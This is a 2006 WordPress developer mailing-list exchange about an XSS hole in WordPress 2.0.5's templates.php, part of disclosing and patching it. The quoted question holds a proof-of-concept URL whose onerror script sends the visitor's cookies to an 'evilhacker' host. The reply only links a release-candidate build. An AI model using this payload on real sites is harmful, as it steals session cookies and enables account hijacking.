[wp-hackers] Xss Vulnerability

Ryan Boren ryan at boren.nu
Thu Dec 28 17:48:07 GMT 2006


On 12/28/06, dabos <daboslab at gmail.com> wrote:
>
> Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
> wp-admin/templates.php ?
>
> Proof of concept:
>
> https://blogsite/wp/wp-admin/templates.php?file=<img
> src=""onerror=javascript:
> document.location.href='http://evilhacker/captureco
> okie.php?'+document.cookie;>
>
> Is this the solution: http://trac.wordpress.org/changeset/4665 ?
>
> The last question, when the 2.0.6 final version ? Isn't this vulnerability
> in the 2.0.6 Rc 1 ?



For your testing pleasure:

http://wordpress.org/beta/wordpress-2.0.6-RC2.zip

Ryan


More information about the wp-hackers mailing list